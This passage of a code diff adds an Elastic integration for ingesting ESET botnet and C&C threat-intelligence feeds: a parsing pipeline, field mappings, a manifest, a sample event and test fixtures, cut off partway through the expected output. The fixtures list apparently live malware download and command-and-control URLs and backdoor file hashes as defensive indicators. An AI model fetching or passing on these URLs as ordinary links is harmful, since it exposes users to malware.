b/packages/ti_eset/data_stream/botnet/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,156 @@ +--- +description: Pipeline for processing botnet collection feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET Botnet stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - date: + field: eti.valid_until + target_field: eset.valid_until + formats: + - "ISO8601" + if: "ctx.eti?.valid_until != null" + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + - rename: + field: eti.description + target_field: threat.indicator.description + ignore_missing: true + - foreach: + field: eti.labels + processor: + append: + field: eset.labels + value: "{{_ingest._value}}" + ignore_missing: true + ignore_failure: true + if: ctx.eti?.labels != null + - script: + lang: painless + params: + "malicious-activity": 'High' + "phishing-activity": 'High' + "unwanted-activity": 'Medium' + "benign": 'Low' + if: ctx.eset?.labels != null + source: > + for (def label : ctx.eset.labels) { + if (params.containsKey(label)) { + ctx.threat.indicator.confidence = params.get(label); + break; + } + } + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' OR ' + ignore_missing: true + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[?file:hashes.'MD5'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?" + - "^\\[?file:hashes.'SHA-1'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?" + - "^\\[?file:hashes.'SHA-256'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?" + - "^\\[url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?" + ignore_failure: true + + - set: + field: threat.indicator.type + value: url + if: "ctx.threat?.indicator?.url != null" + - set: + field: threat.indicator.type + value: file + if: ctx.threat?.indicator?.file != null + - set: + field: threat.indicator.name + copy_from: eti.name + if: "ctx.eti?.name != null" + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_eset/data_stream/botnet/fields/agent.yml b/packages/ti_eset/data_stream/botnet/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/data_stream/botnet/fields/base-fields.yml b/packages/ti_eset/data_stream/botnet/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/botnet/fields/ecs.yml b/packages/ti_eset/data_stream/botnet/fields/ecs.yml new file mode 100644 index 00000000000..43534883f1c --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/fields/ecs.yml @@ -0,0 +1,42 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/data_stream/botnet/fields/fields.yml b/packages/ti_eset/data_stream/botnet/fields/fields.yml new file mode 100644 index 00000000000..bf7e7383df2 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/fields/fields.yml @@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/botnet/lifecycle.yml b/packages/ti_eset/data_stream/botnet/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/botnet/manifest.yml b/packages/ti_eset/data_stream/botnet/manifest.yml new file mode 100644 index 00000000000..4a5f15e49df --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/manifest.yml @@ -0,0 +1,95 @@ +type: logs +title: "Botnet" +ilm_policy: logs-ti_eset.botnet-default_policy +streams: + - input: httpjson + title: Botnet + description: Collect data from ETI Botnet feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of Botnet collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-botnet + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/botnet/sample_event.json b/packages/ti_eset/data_stream/botnet/sample_event.json new file mode 100644 index 00000000000..f886d4a570b --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/sample_event.json @@ -0,0 +1,73 @@ +{ + "@timestamp": "2023-10-18T02:05:09.000Z", + "agent": { + "ephemeral_id": "29211d59-f061-4b27-a169-6db0193f8177", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.botnet", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-20T02:05:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:18:01.686Z", + "dataset": "ti_eset.botnet", + "ingested": "2024-03-27T14:18:13Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-18T02:05:09.000Z\",\"description\":\"Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.\",\"id\":\"indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-18T02:05:09.000Z\",\"name\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='373d34874d7bc89fd4cefa6272ee80bf'] OR [file:hashes.'MD5'='373d34874d7bc89fd4cefa6272ee80bf']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-18T02:05:09Z\",\"valid_until\":\"2023-10-20T02:05:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-botnet" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.", + "file": { + "hash": { + "md5": "373d34874d7bc89fd4cefa6272ee80bf", + "sha1": "373d34874d7bc89fd4cefa6272ee80bf", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-18T02:05:09.000Z", + "modified_at": "2023-10-18T02:05:09.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..8f7e078328f --- /dev/null +++ b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log @@ -0,0 +1,10 @@ +{"id": "indicator--d4b78820-bf32-4665-a8f8-d5bb1d417502", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.124.1/theme/Plugins/clip64.dll']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--799e3cc2-4cd0-45bb-a33e-eab2d7537a25", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.124.1/theme/index.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--d756f043-1f54-4b73-b858-098b7af79adb", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza/nalo.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--17444639-a914-4ec6-9706-68414d448e73", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza/foto3553.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--e6a2a190-b5aa-4f95-9565-8a4cf6bb3a37", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.124.1/theme/Plugins']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--18d2048f-24b6-4895-9a01-de0b2fb91300", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--0be0952c-3056-4220-9c31-c9b7a32a5d2c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza/sus.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--a24fc10b-803e-4804-a5b3-82719a13cacc", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:09.000Z", "modified": "2023-10-15T02:10:09.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='https://beelowers.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:09Z", "valid_until": "2023-10-17T02:10:09Z", "labels": ["malicious-activity"]} +{"id": "indicator--595b7750-06b6-4c8d-bf0d-0708081ba7af", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:09.000Z", "modified": "2023-10-15T02:10:09.000Z", "name": "example.com", "description": "C&C of Win32/Smokeloader.H trojan", "pattern": "[url:value='https://transfer.sh/get/QaPzxFmFQh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:09Z", "valid_until": "2023-10-17T02:10:09Z", "labels": ["malicious-activity"]} +{"id": "indicator--c2c4c382-6eb3-4577-947d-2769c29bb1fa", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:09.000Z", "modified": "2023-10-15T02:10:09.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://mikolyda.beget.tech/385119']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:09Z", "valid_until": "2023-10-17T02:10:09Z", "labels": ["malicious-activity"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..3edd8c08d96 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log-expected.json @@ -0,0 +1,434 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d4b78820-bf32-4665-a8f8-d5bb1d417502", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--d4b78820-bf32-4665-a8f8-d5bb1d417502\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.124.1/theme/Plugins/clip64.dll']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins/clip64.dll" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--799e3cc2-4cd0-45bb-a33e-eab2d7537a25", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--799e3cc2-4cd0-45bb-a33e-eab2d7537a25\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.124.1/theme/index.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/index.php" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d756f043-1f54-4b73-b858-098b7af79adb", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--d756f043-1f54-4b73-b858-098b7af79adb\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza/nalo.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/nalo.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--17444639-a914-4ec6-9706-68414d448e73", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--17444639-a914-4ec6-9706-68414d448e73\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza/foto3553.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/foto3553.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e6a2a190-b5aa-4f95-9565-8a4cf6bb3a37", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e6a2a190-b5aa-4f95-9565-8a4cf6bb3a37\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.124.1/theme/Plugins']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--18d2048f-24b6-4895-9a01-de0b2fb91300", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--18d2048f-24b6-4895-9a01-de0b2fb91300\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza" + } + } + } + }, + { + "@timestamp": 